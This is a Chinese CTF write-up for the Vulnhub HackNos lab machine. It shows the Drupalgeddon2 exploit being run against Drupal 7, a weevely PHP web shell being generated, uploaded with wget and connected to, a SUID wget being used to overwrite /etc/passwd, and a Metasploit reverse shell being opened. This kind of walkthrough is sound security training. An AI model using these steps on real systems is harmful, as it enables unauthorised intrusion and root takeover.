Vulnhub-HackNos-Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址:

https://drive.google.com/open?id=1IOpXibf-A9iSwoG4IW8HdXFvDBFoy7N1

靶机知识点:

  • nmap
  • weevely
  • passwd
  • openssl
  • wget
  • python

靶机ip:192.168.34.152
kali:192.168.34.80

信息收集

nmap -sV -p 0-65535 192.168.34.152

在这里插入图片描述
看见这两个就知道是web了

dirb http://192.168.34.152

扫个目录看看

在这里插入图片描述

东西还不少,我看了一下,drupal框架。

在这里插入图片描述

whatweb 192.168.34.152/drupal

在这里插入图片描述

漏洞利用

百度了一下drupal 7的漏洞
下载个工具

git clone https://github.com/dreadlocked/Drupalgeddon2.git

进入目录,直接运行。

./drupalgeddon2.rb http://192.168.34.152/drupal

在这里插入图片描述

想写个小马,发现不能写。

在这里插入图片描述

使用weevely生成个小马

weevely generate cmd ./xiaoma.php

在这里插入图片描述
使用python搭建简易服务器,然后通过wget下载。
在这里插入图片描述
连接小马

weevely http://192.168.34.152/drupal/xiaoma.php cmd

在这里插入图片描述

权限提升

在/var/www/html下发现了一个文件
在这里插入图片描述
base64编码

echo KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA== | base64 -d

在这里插入图片描述

解码后是brainfuck,再次解码
https://www.splitbrain.org/services/ook

在这里插入图片描述

得到账号密码,ssh登录不上,python也反弹不tty。
在这里插入图片描述
在这里插入图片描述

看看有没有什么权限

audit_suidsgid -only-suid /

在这里插入图片描述

有wget。准备覆写靶机的/etc/passwd文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

使用msf,反弹

打开msfconsole。

在这里插入图片描述

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

发布了38 篇原创文章 · 获赞 8 · 访问量 2115

猜你喜欢

转载自blog.csdn.net/qq_41918771/article/details/103528640